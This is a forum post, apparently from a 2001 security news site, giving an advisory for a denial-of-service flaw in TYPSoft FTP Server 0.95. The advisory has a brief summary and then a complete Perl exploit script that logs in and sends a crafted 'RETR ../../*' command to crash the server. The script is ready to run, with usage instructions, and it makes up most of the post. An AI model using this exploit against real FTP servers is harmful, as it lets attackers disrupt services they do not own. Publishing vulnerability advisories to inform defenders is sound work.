|
|
| |
|
|
| |
|
|
| |
|
.:::.who's online.:::.
|
|
There are currently, 1 guest(s) and 0 member(s) that are online.
|
|
|
|
|
TYPSoft FTP Server STOR/RETR Denial of Service Vulnerability
posted by: valvoline on 17/10/2001 @ 8.39.48
|
Summary:
TYPSoft FTP Server provides administrators with a small and efficient FTP Server. A security vulnerability in the product allows remote attackers to cause the server to crash, effectively causing a denial of service attack.
Vulnerable systems:
TYPSoft FTP Server version 0.95
Exploit:
#!/usr/bin/perl
use IO::Socket;
use Socket;
print "-= ASGUARD LABS EXPLOIT - TYPSoft FTP Server v0.95 =-\n\n";
if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typ095DOS.pl <host> <user>
<pass> [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };
$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err = "RETR ../../*";
#Both works "STOR" and "RETR"
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: can`t connect to $adr:$prt\n";
$remote->autoflush(1);
print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: can`t send user\n";
print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: can`t send pass\n";
print $remote "$err/\n" and print "3. Sending : ErrorCode...\n\n"or die
"Error: can`t send error code\n";
print "Attack done. press any key to exit\n";
$bla= <STDIN>;
close $remote;
Additional information:
The information has been provided by J. Wagner.
|
comments: (0)
|
|
|
|
|
|
|
| | |
|
|
| |
|
.:::.Login.:::.
|
|
Don't have an account yet? You can create one. As registered user you have some advantages like, comments configuration and post comments with your name. |
|
| |
|
|
|
